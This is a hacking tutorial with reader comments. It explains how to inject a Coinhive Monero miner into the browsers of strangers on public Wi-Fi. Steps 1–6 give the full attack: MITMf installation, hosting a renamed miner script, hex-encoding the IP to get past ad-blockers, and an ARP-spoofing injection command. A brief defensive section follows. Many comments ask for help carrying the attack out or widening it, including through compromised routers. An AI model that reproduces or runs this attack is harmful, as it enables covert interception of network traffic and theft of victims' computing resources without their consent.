How To: Inject Coinhive Miners into Public Wi-Fi Hotspots

Inject Coinhive Miners into Public Wi-Fi Hotspots

Coinhive, a JavaScript cryptocurrency miner, was reportedly discovered on the BlackBerry Mobile website. It was placed there by hackers who exploited a vulnerability in the site's e-commerce software that allowed them to anonymously mine cryptocurrency every time the website was viewed. There's no doubt Coinhive, an innovative mining method, is being abused and exploited by hackers in the wild.

How Coinhive Works & Is Exploited

Coinhive offers a legitimate cryptocurrency miner that website administrators and operators can embed into their websites. When users visit websites hosting the Coinhive miner, JavaScript will run the miner directly in their browsers, mining for cryptocurrency silently in the background using the computers' processors.

This tool was designed as an alternative revenue-generating method for website administrators looking to get rid of ugly banner ads taking up space on their website that could be easily banished using ad-blockers. Instead of Bitcoin (BTC) or other popular cryptocurrencies, Coinhive mines for Monero (XMR) which is valued about 35 times less than Bitcoin at the time of this writing but still in the top 10 most valuable cryptocurrencies available (based on price per coin).

Coinhive itself is a completely legitimate company, but recent events in the news have shown how easily this JavaScript mining technology can be abused by hackers looking to make a quick crypto-buck.

The BlackBerry incident is one of many reported cases where hackers and internet service providers (ISPs) used Coinhive for malicious purposes. In October, TrendMicro discovered several apps found in the Google Play Store which utilized Coinhive's mining technology by invisibly mining cryptocurrencies when the Android apps were installed. There were also reports of Coinhive miners embedded on a Starbuck's website, which was placed there by an ISP.

Learning How Coinhive Can Be Exploited

There are several GitHub projects, such as CoffeeMiner, designed to perform man-in-the-middle (MitM) attacks to inject Coinhive miners into web browsers connected to public Wi-Fi hotspots. However, in my experience with MitM attacks, I believe it would be easier to use a tool like the Man-in-the-Middle Framework (MITMf) to achieve the same results with a single command. MITMf is an excellent tool created to make MitM attacks as simple as possible.

In our example guide, we'll be using MITMf to inject a Coinhive JavaScript miner into other browsers on the same Wi-Fi network. This will allow us to insert JavaScript miners into the webpages of unsuspecting coffee shop goers as they browse the internet.

Before beginning, it's worth noting that Coinhive will terminate any accounts found that implement their JavaScript miner by way of unauthorized means, i.e., hacking. And we recommend you use this guide for educational purposes only, not to actually put into motion on any unsuspecting hotspots you don't own.

Step 1: Installing MITMf

I'll be installing MITMf in Kali Linux using apt-get. Simply type the below command into a terminal. If you'd rather install MITMf from the source code, you can reference Takhion's excellent guide to doing so or the instructions on GitHub.

sudo apt-get install mitmf

That's it for installing MitMF. There's absolutely no configuration required after installing it, so let's dive into creating a Coinhive account next.

Step 2: Creating a Coinhive Account

Now that we have MitMF installed, head over to the Coinhive registration page to create an account. There are no requirements for creating an account with Coinhive — anyone can signup in seconds.

The registration process is very quick and simple. After registering, check your email for the registration confirmation you'll need to complete, then log into your new account. We'll need to locate our unique site key, which is an individual key meant to be used for each website running JavaScript miners. However, we won't be using Coinhive in a conventional way, so we'll only need one site key.

To find your site key, navigate to the "Sites & API Keys" page. The site key we'll be using is next to Site Key (public), so make sure to copy that down for later.

Anyone using an ad-blocker like uBlock Origin will find the Coinhive page appears broken and malformed. The uBlock Origin ad-blocker, one most popular ad-blockers available, currently blacklists the domain. This is no doubt a result of hackers abusing Coinhive. Disable your ad-blocker to register and use Coinhive.

Ad-blocking issues like this indicate that we'll need to take additional steps to ensure ad-blockers don't prevent the Coinhive miner from running in victim browsers. Most ad-blockers will filter out domain names like that have been reported as behaving maliciously. Obfuscating the domain name and JavaScript filename will be important to the success of this attack.

Step 3: Evading Ad-Blockers

First, head over to the Coinhive documentation page where we'll get a better understanding of the JavaScript we'll be injecting into victim browsers. Below is a JavaScript miner in its simplest form.

<script src=""></script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');

The first script source ("script src") line will instruct victim browsers to download the .js file from the Coinhive website. The "var miner" line will tell Coinhive which account is mining the Monero, and the "miner.start" line instructs victim browsers to start mining immediately. We'll need to focus on obfuscating the domain and the .js filename if we want to evade most ad-blockers.

Just note that using steps 4 and 5 below may not effectively evade all ad-blockers. The way a miner works is that it has to report its proof-of-work back to the server, otherwise, it's just mining for no reason. Since the source code is hard-coded to make calls back to the Coinhive server, ad-blockers that block on the DNS level may still block the proofs from getting to the server, preventing any cryptocurrency from being earned on the account. However, ad-blockers that only block on the HTML tag level will almost certainly still get through.

Step 4: Renaming the JavaScript File

To start, let's make a temporary directory on our device to host the Coinhive JavaScript locally. Using the mkdir command, make a directory called coinhive-js" in the /tmp directory. Then, change into the new coinhive-js directory using the cd command.

mkdir /tmp/coinhive-js
cd /tmp/coinhive-js

When that's done, download the Coinhive JavaScript we'll be injecting into victim browsers. On Unix-like systems, we can use wget from a terminal.


Let's also rename the file for further evasion. A random string that's unlikely to be found in an ad-blocker database seems like good practice for this sort of attack. We can easily use OpenSSL from a terminal to generate random strings:

openssl rand -hex 16

The 16 tells OpenSSL to generate 16 random characters. If you wish to generate a longer string, simply increase the value to your preference. Next, we can rename the "coinhive.min.js" filename with the mv command:

mv coinhive.min.js random-string-here.js

I wasn't clever about my random string name for this demonstration. Simply typing random letters and numbers on your keyboard will suffice.

Last, we'll need to host the JavaScript file so that victim browsers on our Wi-Fi network will be able to download it. For this, we'll use a simple python3 command.

python3 -m http.server 80

The http.server is the Python3 HTTP server module we'll be enabling with the -m argument. 80 is the port number the HTTP server will listen on. We can verify our Python3 server is up and working by visiting in our browsers. The is the local address of our computer. This is address is commonly used to host services (like HTTP servers) on our computer.

Step 5: Obfuscating the URL

With our JavaScript ready to go, let's talk about URL obfuscation with hexadecimal encoding. We can easily evade ad-blocker filters by encoding our local IP address. For example, navigating to http://0xC0A80001 in your browser right now will take you to Our browsers are able to understand and interpret hexadecimal strings as if they were plaintext.

There are online tools for converting IP addresses to hexadecimal strings, and that's the easiest way to go about this. First, find your IP address with the ifconfig command.

ifconfig wlan0

Your local IP address will most likely be something like or When you've figured that out, enter your IP into a hexadecimal converter website to get its hexadecimal equivalent value.

Now, let's put it all together! Here's the Coinhive JavaScript again with a hexadecimal IP address and obfuscated filename:

<script src="http://0x0A989811/ghfldghfsdhglfsdhgfd.js "></script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');

Let's now save these 5 lines of code to a file locally, as we'll need to inject it into victim browsers using MITMf. You can use your favorite text editor to save the JavaScript or by typing the below nano command into a terminal.

nano /tmp/coinhive-js/miner.js

We'll save it into the coinhive-js directory we created earlier as miner.js. Press Ctrl + X on your keyboard to exit nano, then press Y and Enter to save the file.

Step 6: Injecting the Miner into Browsers

We have MITMf installed, a new Coinhive account, and a JavaScript payload obfuscated to evade pesky ad-blockers. Now let's see how this is actually put to use.

To use MitMF, run the below command.

mitmf -i wlan0 --inject --js-file /tmp/coinhive-js/miner.js --arp --spoof --gateway

The -i tells MITMf which network interface to attack on, while wlan0 is the default wireless interface in Kali Linux. The gateway address is the local IP address of the Wi-Fi router. is a very common gateway address. To find your router's local IP address, you can try running the route -n command in a terminal. Under the "Gateway" column, you should see something like "192.168.X.X."

Once we've started the MitM attack, all devices connected to the Wi-Fi network will have our JavaScript payload injected into many of their webpages. We'll know a victim browser was affected by our MitM attack when the MITMf terminal reports "Injected JS file:"

We can clearly see someone using the Google Chrome browser on a Windows operating system visiting and our JavaScript payload injected into their browser. Their browser will start mining Monero immediately and will continue to do so until the browser tab is closed.

If we take a closer look at the victim's browser, we can see our Coinhive JavaScript payload was injected into the bottom on their webpage completely without their knowledge.

You may also notice I installed three of the top ad-blockers from the Chrome Web Store. None of the ad-blockers detected this activity as nefarious or malicious.

After the JavaScript miner has been injected into a victim's browser, you can actually disable the MITMf command to stop the attack and the Coinhive JavaScript will continue to mine cryptocurrency in the victim's web browser. If the victim leaves the coffee shop with browser tab open, the Coinhive JavaScript will continue mining the next time they're online on any Wi-Fi network. The Coinhive miner will continue until the victim closes the infected browser tab or closes their web browser entirely.

How to Protect Yourself from JavaScript Miners

Well, it's clear ad-blockers are not the most effective method of dealing with JavaScript miners. With some trivial evasion techniques, cryptocurrency miners may still find their way into your web browser.

  • The best way to avoid running malicious JavaScript code in your browser is to disable JavaScript entirely. Only enable and use JavaScript when it's absolutely necessary. NoScript is often recommended by security professionals and is currently the most convenient way of quickly enabling JavaScript on an as-needed basis.
  • Opera also includes a feature called "NoCoin" that blocks cryptocurrency mining scripts on webpages, so that's an interesting browser option if you're not in love with Chrome, Safari, Edge, etc. However, there are some browser extensions that do something similar.
  • If you don't want to block JavaScript, you can monitor your CPU usage frequently to see if there are any suspicious spikes in activity, which could indicate background mining. On a Windows computer, you can check in the "Task Manager," while on Macs, it would be "Activity Monitor."
  • Also, just check the address bar of the browser; If you're on an HTTPS site with the lock in the corner, you likely haven't been MitM'd. Many websites get added to the browser HSTS preload list, which means even if a MitM attack tries to strip HSTS headers and redirect to HTTP instead of HTTPS, the browser won't comply as it knows to only contact that domain over HTTPS. So, the Coinhive mining hack above wouldn't work on these sites anyway. You can check if a site is on the HSTS browser preload list by typing in its root domain name into an online tool.
  • Another step you can take to protect yourself from MitM attacks on public networks is to use a virtual private network (VPN). While using a VPN won't block a miner script served from the server, it will bypass the MiTM attack on the specific access point.
  • If you use an ad-blocker, make sure to use one that works on the DNS level and not just the HTML tag level. While it won't necessarily prevent your computer from becoming a miner, it will prevent them from earning any reward from it.

How Lucrative Is JavaScript Mining?

Readers interested in gauging how profitable Coinhive mining really is may find Maxence Cornet's Medium article insightful. Maxence tried Coinhive on his website for several days with the intention of replacing traditional banner ads with a Coinhive JavaScript miner. With 1,000 visits on Maxence's website per day, he says:

I made 0.00947 XMR in 60 hours, a whopping $0.89, that's $0.36 a day

Not the most impressive returns, but there's no doubt mining cryptocurrency with Coinhive has become a popular avenue for hackers to easily abuse. It may not be very lucrative when used on small websites, but imagine a Coinhive miner on every Facebook and Google page? It could happen.

If you have any questions or concerns about this article, be sure to leave a comment or contact me on Twitter @tokyoneon_.

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.

Cover image via Negative Space/Pexels; Screenshots by tokyoneon/Null Byte


what if I am trying to perform this on a wpa-enterprise? will it work if i enter their radius server ip?

How would I go about injecting Coinhive miners onto networks around the world with compromised router web interfaces?

Would it be possible to exclude certain IP's from the attack so that pinpointed devices aren't affected?

thank you for the tutorial!

I have been trying to see if this method works but somehow, the mitm attacks keep making exceptions because there is an attribute error:

Exception occurred in hooked function
Traceback (most recent call last):
File "/usr/share/mitmf/core/", line 112, in hook
a = f(*args)
File "/usr/share/mitmf/plugins/", line 65, in response
mime = response.headers'Content-Type'
AttributeError: ClientRequest instance has no attribute 'headers'

Mind sharing what is causing this? At first, I have tried doing this via internal adapter seeing how it only requires wlan0. Then, because it didn't work, I have connected my Atheros chipset adapter and edited all the files according to the adapter ip. However, it deemed no results.

Hello community.

I followed all of these steps but I ended with this error when I launched MiTMF:

* MITMf v0.9.8 - 'The Dark Side'
|_ Net-Creds v1.0 online
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ Inject v0.4
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|_ MITMf-API online
|_ HTTP server online
Traceback (most recent call last):

File "", line 170, in <module>
from core.servers.DNS import DNSChef
File "/usr/share/mitmf/core/servers/", line 46, in <module>
from IPy import IP
ImportError: No module named IPy

You must know that I'm working in an Arch based system manjaro.

All steps were OK but I'm stuck at this one. I tried to search for Ipy packages and I found a compiled package at github but I don't know how to install it in an Arch system. Don't even know if installing it would solve my problem.

Thanks in advance

EDIT: Solved guys. Just installed python2-ipy via pacman and the issue was gone.

can someone please help me out here?
i'm trying to do the coinhive miner injection
i'm running a persistent kali linux usb. the tutorial worked once but the next time it just didn't work,

just a man trying to learn.

quick update my mitmf is running but i don't seem to be mining anything. can someone help me out here ? as in the shows the javascript being injected and my target seems to be affected, the page is not secure yet there seems to be no mining taking place. can anyone help ?

Mitm attack not working it isn't injecting js or doing any sort of attack like spoofing etc etc can anybody tell me what am supposed to do thankyou??


Fist of all, thank you very much for your post!

Second thing; I'm able to inject the miner.js file but it seems like this is not working on every site. For example it's working on '' and with dns spoofing enabled on some (not too much) HTTPS site's.

Is there any possibility I can inject the JS code in every single website visited by the whole network?

Regards, Djitn

i just complet all the steps which are mention above
but when I open any website in victum pc mining is not going to start but in Sourcecode the java script is there
when I manually go to http://0xC0A80068/948b336c0bb0a5bf2d8a8d2ce9c740d2.js in victums pc it says
page is not found
how to fix it

just dropping thanks, i didn't read all the details maybe later.

I just tried this method.
However the results is a bit different like it said
DNS could not proxy request: time out after the MITMF attack.
It seems like failed.
Basically, I did the same thing step by step and changed the IP only.

Is there anywhere I should check again?

Anyway, thanks for this post.

Hey boys, you need to use this: pip install Twisted==15.5.0

Would It be posible leaving the miner in that wifi Network And make It keep mining while not being conected ourselves to that Network? I have the wifi and AP password.

Is it possible to do this with a coinhive alternative now?

Really awesome tutorial. thanks.
My question though is: isn't the domain shut down? What do we do know?

Share Your Thoughts

  • Hot
  • Latest